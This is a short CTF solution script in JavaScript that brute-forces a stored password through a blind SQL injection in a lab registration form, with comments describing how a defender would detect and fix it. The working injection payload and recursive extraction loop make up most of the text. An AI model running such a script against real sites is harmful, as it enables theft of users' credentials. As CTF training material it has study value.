NUS Greyhats CTF Day 2 - Brute force password cracking on a blind SQL injection form
// Run this first: injects jQuery into the page
// Appends a <script> tag pointing at jQuery 2.1.4 on the Google CDN to the
// document body so that `$` is available to the rest of the snippet once the
// script has loaded. No integrity attribute is set, so the page trusts
// whatever the CDN serves.
const s = Object.assign(document.createElement('script'), {
  src: 'https://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js',
});
document.body.appendChild(s);
// SQL query: 1' AND FALSE UNION SELECT * FROM users WHERE password LIKE 'a%' #
// Recursive function to brute force out the password from the page
//
// Reading this as a defender: the registration form's response text is used
// as a yes/no oracle. The script POSTs one candidate prefix per request and
// treats the "Someone has already registered " message as the signal that the
// injected LIKE clause matched a stored row. Every match fans out into 92
// further requests (printable ASCII 32..126 minus the three skipped
// characters), so a run of this shows up in server logs as a burst of POSTs to
// register.php whose `register` field shares a steadily growing prefix.
// The server-side fix is the standard one: bind the `register` value as a
// query parameter instead of splicing it into SQL, and avoid reflecting
// attacker-controlled query outcomes in a distinguishable message. Rate
// limiting the endpoint would additionally slow the enumeration down.
//
// @param {string} p - prefix confirmed so far; the initial call passes ''.
function getPassword(p) {
$.post('http://web.nusgreyhats.org/blindsqli/register.php', {
register: "1' AND FALSE UNION SELECT * FROM users WHERE password LIKE '" + p + "%' #"
}, function(data){
// The oracle check: presence of this message is taken to mean the prefix matched.
if (data.indexOf('Someone has already registered ') !== -1) {
console.log(p);
// Fan out over printable ASCII; each iteration issues another POST.
for (var i = 32; i <= 126; i++) {
// Characters that would break the quoting or act as LIKE wildcards are skipped.
if (["'", "%", "_"].indexOf(String.fromCharCode(i)) !== -1) continue;
getPassword(p + String.fromCharCode(i));
}
}
});
}
// Entry point: start the search from the empty prefix.
getPassword('');